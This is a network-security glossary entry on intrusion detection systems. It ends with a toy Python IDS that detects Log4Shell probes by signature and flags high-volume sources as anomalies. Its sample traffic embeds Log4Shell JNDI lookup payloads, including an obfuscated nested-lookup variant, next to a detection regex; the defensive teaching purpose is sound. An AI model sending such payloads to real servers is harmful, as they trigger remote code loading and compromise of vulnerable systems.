Network Security
Intrusion Detection System (IDS)
Also known as: IDS
Definition
A passive, out-of-band security control that monitors a copy of network traffic or host activity for malicious behaviour and raises alerts. Because it does not sit in the traffic path it cannot block what it detects; that is the defining difference from an IPS.
Examples
- Suricata receiving mirrored traffic from a switch SPAN port and alerting when an HTTP header carries a Log4Shell (CVE-2021-44228) JNDI lookup string such as ${jndi:ldap://...}.
- OSSEC's file-integrity monitoring on a Linux host detecting a change to /etc/passwd and forwarding the alert to a SIEM.
Related terms
Intrusion Prevention System (IPS)
An inline security control that detects malicious traffic and actively blocks, resets, or scrubs it in real time. Because it sits in the traffic path, a false positive drops legitimate traffic and a sensor failure can interrupt connectivity, so IPS rule sets are tuned more conservatively than IDS ones.
Host-Based IDS (HIDS)
An intrusion-detection agent installed on a server or endpoint that monitors local files, processes, logs, and system calls for malicious activity.
Network-Based IDS (NIDS)
An intrusion-detection sensor that inspects traffic captured from a network segment to identify malicious patterns and policy violations.
Signature-Based Detection
A detection method that compares observed traffic, files, or behaviour against a database of known-bad patterns (signatures) to flag malicious activity. It is precise for known threats but blind to novel or obfuscated variants until a matching signature is written.
Anomaly-Based Detection
A detection approach that builds a baseline of normal activity and flags deviations from it as potentially malicious. It can catch previously unseen attacks but produces more false positives, and a baseline learned while an attacker is already active will treat that activity as normal.
SIEM
A platform that aggregates, normalizes and correlates security telemetry from across the enterprise to enable detection, investigation, compliance and reporting.
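Worked example (added here; not code from the glossary, Suricata or OSSEC): a toy passive IDS in Python that illustrates the two Examples above and the Signature-Based and Anomaly-Based Detection entries. It runs over constructed HTTP request records of the kind a sensor would see from a SPAN port. The signature path normalises the common ${lower:x}/${upper:x} obfuscation seen in Log4Shell probes before matching, so a literal "${jndi:" check is not fooled by the nested form; the anomaly path learns a per-source request-volume baseline and flags sources well above it. The IP addresses, paths, thresholds and sample requests are all invented for the example. Alerts are returned, never enforced; enforcing them would make this an IPS.

```python
"""Toy passive IDS: signature-based and anomaly-based detection over
constructed HTTP request records. Example code, not a real sensor."""
import re
import statistics
from collections import Counter
from dataclasses import dataclass


@dataclass
class Request:
    src_ip: str
    path: str
    headers: dict


# ---- Signature-based detection -------------------------------------------
# Log4Shell probes carry a JNDI lookup such as ${jndi:ldap://host/a}. Attackers
# obfuscate it with nested lookups, e.g. ${${lower:j}ndi:...}. We strip the
# ${lower:x}/${upper:x} wrappers before matching; other Log4j tricks such as
# ${::-j} default-value syntax are not handled by this simplified normaliser.
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
JNDI_SIGNATURE = re.compile(
    r"\$\{jndi:(?:ldap|ldaps|rmi|dns|iiop|corba|nis|nds)://", re.IGNORECASE)


def normalise(value: str) -> str:
    """Repeatedly unwrap ${lower:x}/${upper:x} until the string stops changing."""
    prev = None
    while prev != value:
        prev = value
        value = _CASE_WRAPPER.sub(lambda m: m.group(1), value)
    return value


def signature_alerts(req: Request) -> list:
    """Return one alert per request field that matches the JNDI signature."""
    fields = [("path", req.path)] + [(f"header:{k}", v) for k, v in req.headers.items()]
    return [f"SIG Log4Shell JNDI lookup from {req.src_ip} in {field}"
            for field, value in fields if JNDI_SIGNATURE.search(normalise(value))]


# ---- Anomaly-based detection ---------------------------------------------
def build_baseline(training: list) -> tuple:
    """Learn normal per-source request volume as (mean, population stdev)."""
    values = list(Counter(r.src_ip for r in training).values())
    return statistics.mean(values), statistics.pstdev(values)


def anomaly_alerts(observed: list, baseline: tuple, sigmas: float = 3.0) -> list:
    """Flag sources whose request count exceeds mean + sigmas * stdev."""
    mean, stdev = baseline
    # Floor the spread so a perfectly flat baseline does not alert on everything.
    threshold = mean + sigmas * max(stdev, 1.0)
    counts = Counter(r.src_ip for r in observed)
    return [f"ANOM {ip} sent {n} requests (threshold {threshold:.1f})"
            for ip, n in sorted(counts.items()) if n > threshold]


def run_ids(observed: list, training: list) -> list:
    """Passive sensor: produce alerts for both detectors, block nothing."""
    alerts = []
    for req in observed:
        alerts.extend(signature_alerts(req))
    alerts.extend(anomaly_alerts(observed, build_baseline(training)))
    return alerts


# ---- Constructed sample traffic (invented for this example) ---------------
def _traffic(src: str, n: int, path: str = "/index.html") -> list:
    return [Request(src, path, {"User-Agent": "Mozilla/5.0"}) for _ in range(n)]


TRAINING = (_traffic("10.0.0.11", 10) + _traffic("10.0.0.12", 12) + _traffic("10.0.0.13", 11)
            + _traffic("10.0.0.14", 9) + _traffic("10.0.0.15", 13))

OBSERVED = (
    _traffic("10.0.0.11", 11) + _traffic("10.0.0.12", 12)
    # plain JNDI lookup in the User-Agent header
    + [Request("203.0.113.7", "/login", {"User-Agent": "${jndi:ldap://203.0.113.7:1389/a}"})]
    # obfuscated variant that a literal "${jndi:" match would miss
    + [Request("203.0.113.8", "/login", {"X-Api-Version": "${${lower:j}${upper:n}di:rmi://203.0.113.8/x}"})]
    # benign-looking requests, but far above the learned volume baseline
    + _traffic("198.51.100.9", 60, path="/wp-login.php")
)

if __name__ == "__main__":
    for line in run_ids(OBSERVED, TRAINING):
        print(line)
```

Running it prints two SIG alerts (one for each JNDI-carrying request, including the obfuscated one) and one ANOM alert for the high-volume source; the anomaly detector says nothing about the two exploit attempts because a single request is not unusual volume, which is why the two approaches are deployed together.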